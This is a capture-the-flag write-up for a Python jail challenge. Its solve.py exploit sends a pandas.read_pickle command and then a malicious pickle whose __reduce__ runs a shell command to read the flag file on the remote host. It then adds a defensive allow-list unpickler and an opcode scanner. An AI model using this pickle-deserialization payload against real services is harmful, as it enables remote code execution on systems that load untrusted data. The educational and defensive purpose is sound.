description
the actual description reads: “im stuck in a Pickle, can you help me out of jail?”
this challenge was pretty fun and took me a while to solve because it was completely black-box. the challenge gave users a Python shell and the ability to execute one command. a strict whitelist only allowed the sys and pandas modules to be used; anything else would be denied. there was also a blacklist restricting the special characters that could be used.
clearly, based on the description, we needed to do something with pickle deserialization to get code execution, but how we get there is the problem.
writeup
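to exploit the application we put together a pickle, then use our one command to read the pickle from stdin, as demonstrated in solve.py. pandas.read_pickle accepts a file-like object and deserializes it with pickle, so the callable returned by the object's __reduce__ is invoked on the server during loading.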
solve.py
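#!/usr/bin/env python3
from pwn import *
import pickle
import posix

context.log_level = "critical"

p = remote("0.cloud.chals.io", 17738)
p.recvuntil(b">>>")

# the single allowed command: only uses the whitelisted sys and pandas modules
v = "pandas.read_pickle(sys.stdin.buffer)"
p.sendline(v.encode("utf-8"))


class Payload:
    # pickle calls the returned callable with the given args during loading
    def __reduce__(self):
        return (posix.system, ('cat /flag.txt',))


# the pickle bytes are read from stdin by the command sent above
payload = pickle.dumps(Payload())
p.send(payload)

# collect everything until the server closes the connection
result = b""
while True:
    try:
        result += p.recv()
    except EOFError:
        break

if b"Nope" not in result and b"Wrong" not in result:
    print(v)
    print(result.decode())
else:
    print(result)
    print("bad", v)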
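the defensive counterpart, as an added example that is not part of the original writeup or the challenge source: a loader that refuses every global a pickle asks to import, plus a static opcode walk that lists those globals without executing anything. the names AllowlistUnpickler, safe_loads, referenced_globals and Sample are hypothetical, the sample pickle is constructed, and the empty allow-list assumes the service only needs plain containers.

```python
import io
import os
import pickle
import pickletools

# Assumption: the service only exchanges plain containers, so nothing is allow-listed.
ALLOWED_GLOBALS = set()  # e.g. {("collections", "OrderedDict")}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


class AllowlistUnpickler(pickle.Unpickler):
    """Refuse every import the stream requests unless it is allow-listed."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Replacement for pickle.loads; raises before any callable is resolved."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


def referenced_globals(data):
    """List (module, name) imports by walking opcodes; nothing is executed."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            # Heuristic: module and name are normally the last two strings pushed.
            found.append(tuple(strings[-2:]) if len(strings) > 1 else ("?", "?"))
    return found


class Sample:  # constructed sample with the same shape as the payload in solve.py
    def __reduce__(self):
        return (os.system, ("echo constructed-sample",))


SAMPLE = pickle.dumps(Sample())  # only serialised here, never loaded unsafely

if __name__ == "__main__":
    print(referenced_globals(SAMPLE))
    try:
        safe_loads(SAMPLE)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

the opcode walk is a triage aid only; the allow-list in find_class is what actually stops the import, because it raises before REDUCE can call anything.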